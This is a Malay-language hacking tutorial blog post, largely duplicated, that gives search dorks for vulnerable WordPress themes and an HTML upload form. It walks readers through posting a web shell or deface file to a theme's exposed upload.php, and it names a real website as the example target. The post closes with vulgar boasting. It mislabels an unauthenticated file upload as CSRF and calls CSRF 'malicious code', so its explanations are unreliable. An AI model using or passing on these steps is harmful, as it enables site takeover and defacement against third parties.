Hi Im Irfan Hazim ,
Harini , I want to teach you about CSRF . Dalam banyak2 method , method ni pling berkesan :3
Sebenarnya , CRSF iatu Cross Site Request Forgery juga dikenali sebagai SideJacking ataupun Click-Attack ,adalah sejenis kod jahat ( malicious code ).Banyak laman web gagal untuk melindungi terhadap mereka kerana kurang komuniti pembangunan web, dan apa-apa permohonan web tanpa dibina dalam kawalan CSRF adalah terdedah.
Ni Dork Dia .
inurl:/wp-content/themes/shepard inurl:/wp-content/themes/money inurl:/wp-content/themes/clockstone inurl:/wp-content/themes/ambleside inurl:/wp-content/themes/pacifico Pilih salah satu :) Exploit :
<form enctype="multipart/form-data" action="http://localhost" method="post"> <input type="jpg" name="url" value="./" /><br /> Pilih File Deface / Shell Anda: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /> </form> By BHCC/Irfanl
Harini , I want to teach you about CSRF . Dalam banyak2 method , method ni pling berkesan :3
Sebenarnya , CRSF iatu Cross Site Request Forgery juga dikenali sebagai SideJacking ataupun Click-Attack ,adalah sejenis kod jahat ( malicious code ).Banyak laman web gagal untuk melindungi terhadap mereka kerana kurang komuniti pembangunan web, dan apa-apa permohonan web tanpa dibina dalam kawalan CSRF adalah terdedah.
Ni Dork Dia .
inurl:/wp-content/themes/shepard inurl:/wp-content/themes/money inurl:/wp-content/themes/clockstone inurl:/wp-content/themes/ambleside inurl:/wp-content/themes/pacifico Pilih salah satu :) Exploit :
<form enctype="multipart/form-data" action="http://localhost" method="post"> <input type="jpg" name="url" value="./" /><br /> Pilih File Deface / Shell Anda: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /> </form> By BHCC/Irfanl
copy code tu
save as csrf.html
. Dah >? . Jangan Skip ~ Buka site yg korang pilih , contoh : http://www.mswcp.org/wp-content/themes/shepard/images/jPlayer/
Buang images/jplayer
Then , tulis /funtions/ . Tgk situ . Kalau ade uploadify.php or upload.php / upload-bg.php . buka . Kalau die tulis error maknanye VULN!
Lepas tu amek script tadi , buang localhost . letak . http://www.mswcp.org/wp-content/themes/shepard/functions/upload.php . Then save , Buka file tadi . Upload Shell :)
LEPAS TU ROGOL PUAS2 . :P maaf kalau ade terkasar bahasa
~ By Irfan Hazim / BHCC . Kalau x paham search me on fb . fb.com/frostbrake
save as csrf.html
. Dah >? . Jangan Skip ~ Buka site yg korang pilih , contoh : http://www.mswcp.org/wp-content/themes/shepard/images/jPlayer/
Buang images/jplayer
Then , tulis /funtions/ . Tgk situ . Kalau ade uploadify.php or upload.php / upload-bg.php . buka . Kalau die tulis error maknanye VULN!
Lepas tu amek script tadi , buang localhost . letak . http://www.mswcp.org/wp-content/themes/shepard/functions/upload.php . Then save , Buka file tadi . Upload Shell :)
LEPAS TU ROGOL PUAS2 . :P maaf kalau ade terkasar bahasa
~ By Irfan Hazim / BHCC . Kalau x paham search me on fb . fb.com/frostbrake
Posts
Post a Comment - Back to Content